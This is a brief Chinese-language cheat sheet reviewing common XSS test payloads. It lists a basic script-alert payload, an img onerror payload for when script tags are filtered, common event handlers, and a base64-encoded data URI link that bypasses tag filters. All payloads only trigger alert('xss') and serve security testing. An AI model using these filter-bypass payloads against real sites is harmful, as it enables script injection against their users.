回顾几个常见的XSS漏洞测试脚本

回顾几个常见的XSS漏洞测试脚本
基础的测试：

<script>alert('xss')</script>
如果过滤了指定标签 比如：<script>标签
<img src=x onerror="alert('xss')"/>
--常用的on事件：onerror(), onclick(), onmouseover()等
如果标签都被过滤了，可以考虑编码（但需要注意编码输出点是否会解析）
<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4=">test</a>